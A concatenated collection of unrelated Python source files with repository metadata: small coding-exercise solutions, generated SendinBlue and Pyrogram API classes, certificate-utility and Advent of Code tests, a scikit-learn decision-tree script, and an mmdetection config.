'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
| [
"[email protected]"
] | |
6e21f862d7e958f80ed264d9ffd7489494b638db | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py | c79cb4088243b817c276b33d76d8101e5cfec87e | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 135 | py | first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
| [
"[email protected]"
] | |
78e205ae750a4be5a068a55c9c559e1374f631e3 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py | 0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
if len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
a = d[0] - 1
b = d[len(d) - 1]
if b - a != len(d):
print("no")
else:
print("yes")
print("reverse %d %d" % (a + 1, b + 1))
| [
"[email protected]"
] | |
4e8ad11d0b63d59fba4ed5c53a72136da7a90273 | 7c24607e5c201e9a6d4ab86bb89f5aa882aa65bf | /sib_api_v3_sdk/models/create_smtp_template.py | ec035dcd91cc45904777e8a6325c77808f609663 | [
"MIT"
] | permissive | SportPursuit/APIv3-python-library | f9c715f59ada2efce1f8ff69d167e71bfc71b598 | a615e09ccb59d78fd9baa9f45e1a70f2f882fe16 | refs/heads/master | 2021-05-10T13:19:41.566860 | 2017-12-27T10:59:34 | 2017-12-27T10:59:34 | 118,469,772 | 0 | 0 | null | 2018-01-22T14:42:32 | 2018-01-22T14:42:31 | null | UTF-8 | Python | false | false | 11,754 | py | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreateSmtpTemplate(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Maps each python attribute to the swagger type it serialises as.
    swagger_types = {
        'tag': 'str',
        'sender': 'CreateSmtpTemplateSender',
        'template_name': 'str',
        'html_content': 'str',
        'html_url': 'str',
        'subject': 'str',
        'reply_to': 'str',
        'to_field': 'str',
        'attachment_url': 'str',
        'is_active': 'bool'
    }
    # Maps each python attribute to the camelCase JSON key used on the wire.
    attribute_map = {
        'tag': 'tag',
        'sender': 'sender',
        'template_name': 'templateName',
        'html_content': 'htmlContent',
        'html_url': 'htmlUrl',
        'subject': 'subject',
        'reply_to': 'replyTo',
        'to_field': 'toField',
        'attachment_url': 'attachmentUrl',
        'is_active': 'isActive'
    }
    def __init__(self, tag=None, sender=None, template_name=None, html_content=None, html_url=None, subject=None, reply_to=None, to_field=None, attachment_url=None, is_active=None):
        """
        CreateSmtpTemplate - a model defined in Swagger
        """
        self._tag = None
        self._sender = None
        self._template_name = None
        self._html_content = None
        self._html_url = None
        self._subject = None
        self._reply_to = None
        self._to_field = None
        self._attachment_url = None
        self._is_active = None
        # Optional fields are assigned only when provided; template_name and
        # subject are assigned unconditionally because their setters enforce
        # that they are not None (they are required by the API).
        if tag is not None:
            self.tag = tag
        if sender is not None:
            self.sender = sender
        self.template_name = template_name
        if html_content is not None:
            self.html_content = html_content
        if html_url is not None:
            self.html_url = html_url
        self.subject = subject
        if reply_to is not None:
            self.reply_to = reply_to
        if to_field is not None:
            self.to_field = to_field
        if attachment_url is not None:
            self.attachment_url = attachment_url
        if is_active is not None:
            self.is_active = is_active
    @property
    def tag(self):
        """
        Gets the tag of this CreateSmtpTemplate.
        Tag of the template

        :return: The tag of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._tag
    @tag.setter
    def tag(self, tag):
        """
        Sets the tag of this CreateSmtpTemplate.
        Tag of the template

        :param tag: The tag of this CreateSmtpTemplate.
        :type: str
        """
        self._tag = tag
    @property
    def sender(self):
        """
        Gets the sender of this CreateSmtpTemplate.

        :return: The sender of this CreateSmtpTemplate.
        :rtype: CreateSmtpTemplateSender
        """
        return self._sender
    @sender.setter
    def sender(self, sender):
        """
        Sets the sender of this CreateSmtpTemplate.

        :param sender: The sender of this CreateSmtpTemplate.
        :type: CreateSmtpTemplateSender
        """
        self._sender = sender
    @property
    def template_name(self):
        """
        Gets the template_name of this CreateSmtpTemplate.
        Name of the template

        :return: The template_name of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._template_name
    @template_name.setter
    def template_name(self, template_name):
        """
        Sets the template_name of this CreateSmtpTemplate.
        Name of the template

        :param template_name: The template_name of this CreateSmtpTemplate.
        :type: str
        """
        if template_name is None:
            raise ValueError("Invalid value for `template_name`, must not be `None`")
        self._template_name = template_name
    @property
    def html_content(self):
        """
        Gets the html_content of this CreateSmtpTemplate.
        Body of the message (HTML version). The field must have more than 10 characters. REQUIRED if htmlUrl is empty

        :return: The html_content of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._html_content
    @html_content.setter
    def html_content(self, html_content):
        """
        Sets the html_content of this CreateSmtpTemplate.
        Body of the message (HTML version). The field must have more than 10 characters. REQUIRED if htmlUrl is empty

        :param html_content: The html_content of this CreateSmtpTemplate.
        :type: str
        """
        self._html_content = html_content
    @property
    def html_url(self):
        """
        Gets the html_url of this CreateSmtpTemplate.
        Url which contents the body of the email message. REQUIRED if htmlContent is empty

        :return: The html_url of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._html_url
    @html_url.setter
    def html_url(self, html_url):
        """
        Sets the html_url of this CreateSmtpTemplate.
        Url which contents the body of the email message. REQUIRED if htmlContent is empty

        :param html_url: The html_url of this CreateSmtpTemplate.
        :type: str
        """
        self._html_url = html_url
    @property
    def subject(self):
        """
        Gets the subject of this CreateSmtpTemplate.
        Subject of the template

        :return: The subject of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._subject
    @subject.setter
    def subject(self, subject):
        """
        Sets the subject of this CreateSmtpTemplate.
        Subject of the template

        :param subject: The subject of this CreateSmtpTemplate.
        :type: str
        """
        if subject is None:
            raise ValueError("Invalid value for `subject`, must not be `None`")
        self._subject = subject
    @property
    def reply_to(self):
        """
        Gets the reply_to of this CreateSmtpTemplate.
        Email on which campaign recipients will be able to reply to

        :return: The reply_to of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._reply_to
    @reply_to.setter
    def reply_to(self, reply_to):
        """
        Sets the reply_to of this CreateSmtpTemplate.
        Email on which campaign recipients will be able to reply to

        :param reply_to: The reply_to of this CreateSmtpTemplate.
        :type: str
        """
        self._reply_to = reply_to
    @property
    def to_field(self):
        """
        Gets the to_field of this CreateSmtpTemplate.
        This is to personalize the «To» Field. If you want to include the first name and last name of your recipient, add [FNAME] [LNAME]. To use the contact attributes here, these must already exist in SendinBlue account

        :return: The to_field of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._to_field
    @to_field.setter
    def to_field(self, to_field):
        """
        Sets the to_field of this CreateSmtpTemplate.
        This is to personalize the «To» Field. If you want to include the first name and last name of your recipient, add [FNAME] [LNAME]. To use the contact attributes here, these must already exist in SendinBlue account

        :param to_field: The to_field of this CreateSmtpTemplate.
        :type: str
        """
        self._to_field = to_field
    @property
    def attachment_url(self):
        """
        Gets the attachment_url of this CreateSmtpTemplate.
        Absolute url of the attachment (no local file). Extensions allowed xlsx, xls, ods, docx, docm, doc, csv, pdf, txt, gif, jpg, jpeg, png, tif, tiff and rtf

        :return: The attachment_url of this CreateSmtpTemplate.
        :rtype: str
        """
        return self._attachment_url
    @attachment_url.setter
    def attachment_url(self, attachment_url):
        """
        Sets the attachment_url of this CreateSmtpTemplate.
        Absolute url of the attachment (no local file). Extensions allowed xlsx, xls, ods, docx, docm, doc, csv, pdf, txt, gif, jpg, jpeg, png, tif, tiff and rtf

        :param attachment_url: The attachment_url of this CreateSmtpTemplate.
        :type: str
        """
        self._attachment_url = attachment_url
    @property
    def is_active(self):
        """
        Gets the is_active of this CreateSmtpTemplate.
        Status of template. isActive = true means template is active and isActive = false means template is inactive

        :return: The is_active of this CreateSmtpTemplate.
        :rtype: bool
        """
        return self._is_active
    @is_active.setter
    def is_active(self, is_active):
        """
        Sets the is_active of this CreateSmtpTemplate.
        Status of template. isActive = true means template is active and isActive = false means template is inactive

        :param is_active: The is_active of this CreateSmtpTemplate.
        :type: bool
        """
        self._is_active = is_active
    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Serialise nested models held inside lists.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Serialise nested models held as dict values.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, CreateSmtpTemplate):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| [
"[email protected]"
] | |
70bbe8208649b16729cf28e1e4a6518b00610e12 | 0617c812e9bf58a2dbc1c1fef35e497b054ed7e4 | /venv/Lib/site-packages/pyrogram/raw/functions/account/check_username.py | d280838035783c8751c6caf5d199e15af0b780fc | [] | no_license | howei5163/my_framework | 32cf510e19a371b6a3a7c80eab53f10a6952f7b2 | 492c9af4ceaebfe6e87df8425cb21534fbbb0c61 | refs/heads/main | 2023-01-27T14:33:56.159867 | 2020-12-07T10:19:33 | 2020-12-07T10:19:33 | 306,561,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,138 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Pyrogram. If not, see <http://www.gnu.org/licenses/>.
from io import BytesIO
from pyrogram.raw.core.primitives import Int, Long, Int128, Int256, Bool, Bytes, String, Double, Vector
from pyrogram.raw.core import TLObject
from pyrogram import raw
from typing import List, Union, Any
# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class CheckUsername(TLObject):  # type: ignore
    """Telegram API method.

    Details:
        - Layer: ``117``
        - ID: ``0x2714d86c``

    Parameters:
        username: ``str``

    Returns:
        ``bool``
    """
    __slots__: List[str] = ["username"]
    ID = 0x2714d86c
    QUALNAME = "pyrogram.raw.functions.account.CheckUsername"
    def __init__(self, *, username: str) -> None:
        # Single string field; no optional flags in this constructor.
        self.username = username  # string
    @staticmethod
    def read(data: BytesIO, *args: Any) -> "CheckUsername":
        # No flags
        return CheckUsername(username=String.read(data))
    def write(self) -> bytes:
        buffer = BytesIO()
        buffer.write(Int(self.ID, False))
        # No flags
        buffer.write(String(self.username))
        return buffer.getvalue()
| [
"houwei5163"
] | houwei5163 |
b7d132d47f8448aeb6077d1264063bf458f2674c | e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b | /Project Euler/014 - Collatz sequance.py | d3aabfadf4ae8c3e4f5527c2ef44622211ca50e0 | [] | no_license | thran/the_code | cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a | ba73317ddc42e10791a829cc6e1a3460cc601c44 | refs/heads/master | 2023-01-05T14:39:16.708461 | 2022-12-25T08:37:39 | 2022-12-25T08:37:39 | 160,978,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | def next_collatz(n):
if n % 2 == 0:
return n / 2
return 3 * n + 1
def collatz_lenght(n):
    """Return the number of terms in the Collatz sequence starting at n.

    Iterative rather than recursive, so very long chains cannot hit the
    recursion limit; the Collatz step is inlined, which also makes the
    function self-contained.  The (misspelled) name is kept for callers.
    """
    length = 1
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        length += 1
    return length
m = 0  # length of the longest chain seen so far
best = 0  # starting number that produced that chain
# Project Euler 14: which starting number below one million produces the
# longest Collatz chain?
for i in range(1, 10**6):
    l = collatz_lenght(i)
    if m < l:
        m = l
        best = i
# Python 2 print statement: longest chain length, then its starting number.
print m, best
"[email protected]"
] | |
44b80c569089638f50802259a2b208a0acc1f02b | ee58b29d8982cc6987b986ee616bc47b6a8d8aa3 | /python/dcp_367_merge_iterators.py | fa15d8ab6be1c94d2399b380055906ae31def2cf | [] | no_license | gubenkoved/daily-coding-problem | 7dd9e0a7ee6606a04cd50fa2766e650da1259f7b | ea8b352b1d3d1f44cd0f04ddaadf3e662f4c85bf | refs/heads/master | 2021-07-03T22:31:50.519730 | 2020-09-27T10:28:09 | 2020-09-27T10:28:09 | 172,369,604 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,255 | py | # This problem was asked by Two Sigma.
#
# Given two sorted iterators, merge it into one iterator.
#
# For example, given these two iterators:
#
# foo = iter([5, 10, 15])
# bar = iter([3, 8, 9])
# You should be able to do:
#
# for num in merge_iterators(foo, bar):
# print(num)
#
# # 3
# # 5
# # 8
# # 9
# # 10
# # 15
#
# Bonus: Make it work without pulling in the contents of the iterators in memory.
def merge(*iterators):
    """Lazily merge already-sorted iterators into one sorted iterator.

    Delegates to heapq.merge, which keeps only one pending value per input
    in memory, so the iterators are never materialised.  This also fixes
    two bugs in the previous hand-rolled version: ``del`` on the *args
    tuple raised TypeError, and priming with ``next()`` crashed on any
    empty input iterator.
    """
    import heapq  # local import: this script has no top-level import section
    return heapq.merge(*iterators)
assert list(merge(iter([1, 2, 3]))) == [1, 2, 3]
# Bug fix: the second iterator must wrap a list -- iter(3, 8, 9) raised TypeError.
assert list(merge(iter([5, 10, 15]), iter([3, 8, 9]))) == [3, 5, 8, 9, 10, 15]
assert list(merge(iter([10, 20, 30]), iter([15, 25]), iter([17]))) == [10, 15, 17, 20, 25, 30]
"[email protected]"
] | |
4bd60b2710f545f82a96f3c453c1fe5e6af26c4e | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step01/4-CORE/day02_15/demo04.py | 899097f7197eb4379f74f3afa0259428d5a3dcf2 | [] | no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,200 | py | # author: Ziming Guo
# time: 2020/2/24
"""
demo04:
异常处理
练习:exercise03.py
"""
def div_apple(apple_count):
    """Ask how many people share `apple_count` apples and print each share.

    May raise ValueError (non-integer input) or ZeroDivisionError (zero
    people); the surrounding demo code exercises the try/except forms.
    """
    # int() raises ValueError on non-numeric input.
    person_count = int(input("请输入人数:"))
    # Raises ZeroDivisionError when person_count is 0.
    result = apple_count / person_count
    print("每人%d个苹果"%result)
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
"""
"""
# "建议"分门别类的处理
try:
# 可能出错的代码
div_apple(10)
except ValueError:
print("输入的人数必须是整数")
except ZeroDivisionError:
print("输入的人数不能是零")
except Exception: # 这句话一般是写在最后的,以上错误都不属于才会执行这句话
print("未知错误")
"""
"""
try:
# 可能出错的代码
div_apple(10)
except Exception:
print("出错喽")
else:
# 如果异常,不执行else语句.
print("没有出错")
"""
try:
    # Code that may raise (ValueError / ZeroDivisionError from div_apple).
    div_apple(10)
finally:
    # Runs whether or not an exception was raised.
    print("finally")
    # Purpose: put code that must run even for unhandled errors in finally.
print("后续逻辑.....")
| [
"[email protected]"
] | |
dda479fe3985fbe635d716f2b72e44d05c545d36 | 016109b9f052ffd037e9b21fa386b36089b05813 | /checkTree.py | 824b6551f6e8aaa158948abc4cfda4bca896f43e | [] | no_license | nsshayan/DataStructuresAndAlgorithms | 9194508c5227c5c8c60b9950917a4ea8da8bbab2 | 2f7ee1bc8f4b53c35d1cce62e898a9695d99540a | refs/heads/master | 2022-09-29T21:15:33.803558 | 2022-09-08T17:14:59 | 2022-09-08T17:14:59 | 73,257,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 308 | py | '''
Given :-
the number of nodes in a graph
the degree of each of the vertices
Find whether the given graph is tree or not
'''
N = int(raw_input())
Degree = raw_input().split(" ")
sum = 0
for i in range(len(Degree)):
sum = sum + int(Degree[i])
if sum/2 == N-1:
print "YES"
else :
print "NO" | [
"[email protected]"
] | |
b6faf20877f683beab77c503370315724c92cdac | 5fb579602489728ac47e195bd15838eb632aece4 | /tests/test_utils.py | 99a1fd9fe74c0728ba2a92baf3a1f722c68f4174 | [
"MIT"
] | permissive | Cesare-Liu/cryptokit | 6101701f3daec60ce8ca2f8a2bb464a58ccae20e | bfb90c229279c3c755bdbedfe659d7d5b6e65b51 | refs/heads/master | 2020-03-27T10:38:20.714133 | 2018-06-07T06:15:51 | 2018-06-07T06:15:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,410 | py | # coding: utf-8
"""test utils."""
from __future__ import unicode_literals
import datetime
from unittest import TestCase
from cryptokit.rsa import RSACrypto
from cryptokit.utils import (load_pfx, generate_certificate, generate_pfx,
get_pubkey_from_pfx)
class UtilTestCase(TestCase):
    """End-to-end checks for the certificate / pfx helper functions."""
    def setUp(self):
        # A fresh 2048-bit RSA key pair backs every test case.
        private_key = RSACrypto.generate_private_key(2048)
        RSACrypto.dump_private_key_pem(private_key)
        self.private_key = private_key
        self.public_key = private_key.public_key()
        # The certificate is valid for one year starting today.
        self.not_valid_before = datetime.datetime.today()
        self.not_valid_after = self.not_valid_before + datetime.timedelta(days=365)
        self.payload = {
            'common_name': 'CA',
            'country_name': 'CN',
            'email_address': '[email protected]',
            'org_name': '数字认证中心',
            'company_name': '编程猫科技',
            'state_or_province': '浙江省',
            'locality_name': '杭州市',
            'private_key': self.private_key,
            'public_key': self.public_key,
            'serial_number': 9219100179121295299,
        }
    def test_generate_certificate(self):
        """The generated certificate carries the requested serial number."""
        expected_serial = self.payload['serial_number']
        cert = generate_certificate(
            self.not_valid_before, self.not_valid_after, **self.payload)
        self.assertEqual(cert.serial_number, expected_serial)
    def test_generate_pfx(self):
        """A pfx built from the certificate round-trips through load_pfx."""
        cert = generate_certificate(
            self.not_valid_before, self.not_valid_after, **self.payload)
        pfx = generate_pfx(
            cert, self.payload['company_name'], self.private_key)
        loaded = load_pfx(pfx)
        self.assertEqual(
            cert.serial_number,
            loaded.get_certificate().get_serial_number()
        )
    def test_get_pubkey_from_pfx(self):
        """The public key extracted from the pfx matches the certificate's."""
        cert = generate_certificate(
            self.not_valid_before, self.not_valid_after, **self.payload)
        pfx_file = generate_pfx(
            cert, self.payload['company_name'], self.private_key)
        pubkey = get_pubkey_from_pfx(pfx_file, password=None)
        self.assertEqual(cert.public_key().public_numbers(),
                         pubkey.public_numbers())
| [
"[email protected]"
] | |
d152111c4317b9090484c966da3a4671a305c7de | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02755/s084222637.py | a56cd5d0e5b0b0922a2417c7c93736a84b7a05d5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | a,b=map(int,input().split())
for i in range(100001):
if int(i*0.08) == a and int(i*0.1) == b:
print(i)
break
else:
print(-1) | [
"[email protected]"
] | |
76da4859384e1d8a645aaf5c79f6116f3d66c864 | 38c35956be6343855914b1c58b8fbd2e40c6e615 | /Strings/2023.py | 449cb787bc1f493dc6d2d3557856b2f76693cf95 | [] | no_license | LucasBarbosaRocha/URI | b43e4f4a6b3beed935f24839001bea354411c4bd | 2c9bcc13300a9f6243242e483c8f9ec3296a88ad | refs/heads/master | 2020-06-25T05:06:51.297824 | 2019-08-22T04:50:11 | 2019-08-22T04:50:11 | 199,210,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | lista = []
l = ""
while True:
try:
entrada = input()
l = l + entrada + "+"
except :
break
#print (l)
l = l[:len(l) - 1]
original = l.split("+")
lista = l.lower()
lista = lista.split("+")
lista.sort()
escolhido = lista[len(lista) - 1]
for i in range(len(original)):
if (escolhido == original[i].lower()):
print (original[i])
break
| [
"[email protected]"
] | |
58412d85187532f9f42d4f40e1c022211b03d8f3 | 4e1af52e60dd997fca04be3485e157292cf84b6a | /2020/tests/test_day08.py | c14b7db55c5cf09e4fcbd77b7364367ebec9a8fd | [
"MIT"
] | permissive | JesperDramsch/advent-of-code | e0173d4e78cf274ae461b39d619f56a03ef54773 | ccad3d578be473bf44dea7284c2f99fd67f3271c | refs/heads/main | 2023-01-13T07:18:30.772913 | 2022-12-25T16:12:02 | 2022-12-25T16:39:53 | 160,000,829 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | import sys
import pytest
sys.path.insert(0, ".")
from util import Day
from day08 import *
@pytest.fixture(scope="function")
def day():
    # Fresh puzzle-input wrapper for each test; typing=str presumably keeps
    # each input line as a raw string -- confirm against util.Day.load.
    day = Day(8)
    day.load(typing=str)
    return day
def test_example(day):
    # Worked example program from the puzzle statement (day 8).
    data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
    day.load(data, typing=str)
    # Part 1 on the example input must yield 5.
    assert main(day, part=1) == 5
def test_example_p2(day):
    # Same example program as part 1, exercised against part 2.
    data = """nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6"""
    day.load(data, typing=str)
    # Part 2 on the example input must yield 8.
    assert main(day, part=2) == 8
def test_part1(day):
    """Part 1 against the real puzzle input (regression pin)."""
    result = main(day, part=1)
    assert result == 1753
def test_part2(day):
    """Part 2 against the real puzzle input (regression pin)."""
    result = main(day, part=2)
    assert result == 733
| [
"[email protected]"
] | |
b207fefd6ccd6d562f1572e2426380b43b6f1983 | 76563ffc91a6f35ffab2986693f0124a3a3aaf86 | /Crawler/2-DecisionTreeClassifier.py | 4f7047571f73169fdfd436414573723cf4d2f024 | [] | no_license | zelenkastiot/FCSE-Data-Mining | ab7aea21402742c518857a1c871d3e0a033f8581 | 6e1ffbada09784bb846af54aefc57fe0eb257a17 | refs/heads/master | 2023-02-27T17:14:10.457335 | 2021-02-07T22:13:20 | 2021-02-07T22:13:20 | 289,999,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,994 | py | """
Created on 15-Jan-21
@author: Kiril Zelenkovski
"""
import math
from sklearn.preprocessing import OrdinalEncoder, LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import CategoricalNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score
import pandas as pd
# Read csv and drop the columns that must not be used as features.
dataset = pd.read_csv("dataset.csv")
for unused_column in ("Address Region", "Street Address", "Address Locality",
                      "Postal Code", "Price", "Beds"):
    dataset = dataset.drop(unused_column, 1)
print(dataset)
columns = dataset.columns.tolist()
dataset = dataset.values.tolist()
# Use Ordinal Encoder to encode categorical features as an integer array.
encoder = OrdinalEncoder()
encoder.fit([row[:-1] for row in dataset])
# The last column is the target; everything before it is a feature.
X_dataset = [row[:-1] for row in dataset]
y_dataset = [row[-1] for row in dataset]
X, X_test, y, y_test = train_test_split(X_dataset,
                                        y_dataset,
                                        test_size=0.2,
                                        random_state=42)
# Encode the string features (train split) as ordinal integers.
X = encoder.transform(X)
# Decision Tree Classifier: a non-parametric supervised learning method
# used for classification.
classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)
# Fit the classifier on the encoded training data.
classifier.fit(X, y)
# Encode the test split with the same fitted encoder.
X_test = encoder.transform(X_test)
# Perf fix: predict the whole test matrix in one call instead of one row
# at a time; the resulting label sequence is identical.
y_predicted = list(classifier.predict(X_test))
print(f'DecisionTreeClassifier accuracy: {accuracy_score(y_test, y_predicted, normalize=True):.4f}')
# Print depth for classifier
print('Depth:', classifier.get_depth())
# Print # of leaves for classifier
print('Number of leaves:', classifier.get_n_leaves())
# Load importance of features in list
feature_importance = list(classifier.feature_importances_)
# Most and least important feature
most_important_feature = feature_importance.index(max(feature_importance))
least_important_feature = feature_importance.index(min(feature_importance))
print('Most important feature:', columns[most_important_feature])
print('Least important feature:', columns[least_important_feature])
print(feature_importance)
# Bug fix: columns[feature_importance.index(feature_importance[i])] mapped
# duplicated importance values to the FIRST column with that value; the
# intent is to print the column name for position i.
for i in range(len(feature_importance)):
    print(columns[i])
print(y_predicted)
print(y_test)
# Encode the target labels as integers for the final printout.
le = LabelEncoder()
le.fit([row[-1] for row in dataset])
y_predicted = le.transform(y_predicted)
y_test = le.transform(y_test)
print(y_predicted)
print(y_test)
"[email protected]"
] | |
2ebbafa1c2d6e457a74cceb59b8ab893eab097ca | c5f58af61e3577ded52acda210f4f664651b598c | /template/mmdetection/configs/fpg/retinanet_r50_fpg_crop640_50e_coco.py | 6c517c9bfc6efebd56f35173b33505ea42865e03 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hojihun5516/object-detection-level2-cv-02 | 0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac | bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109 | refs/heads/master | 2023-08-31T09:50:59.150971 | 2021-10-16T15:00:19 | 2021-10-16T15:00:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,470 | py | _base_ = "../nas_fpn/retinanet_r50_nasfpn_crop640_50e_coco.py"
norm_cfg = dict(type="BN", requires_grad=True)
model = dict(
neck=dict(
_delete_=True,
type="FPG",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
inter_channels=256,
num_outs=5,
add_extra_convs=True,
start_level=1,
stack_times=9,
paths=["bu"] * 9,
same_down_trans=None,
same_up_trans=dict(
type="conv",
kernel_size=3,
stride=2,
padding=1,
norm_cfg=norm_cfg,
inplace=False,
order=("act", "conv", "norm"),
),
across_lateral_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
across_down_trans=dict(
type="interpolation_conv",
mode="nearest",
kernel_size=3,
norm_cfg=norm_cfg,
order=("act", "conv", "norm"),
inplace=False,
),
across_up_trans=None,
across_skip_trans=dict(
type="conv", kernel_size=1, norm_cfg=norm_cfg, inplace=False, order=("act", "conv", "norm")
),
output_trans=dict(type="last_conv", kernel_size=3, order=("act", "conv", "norm"), inplace=False),
norm_cfg=norm_cfg,
skip_inds=[(0, 1, 2, 3), (0, 1, 2), (0, 1), (0,), ()],
)
)
evaluation = dict(interval=2)
| [
"[email protected]"
] | |
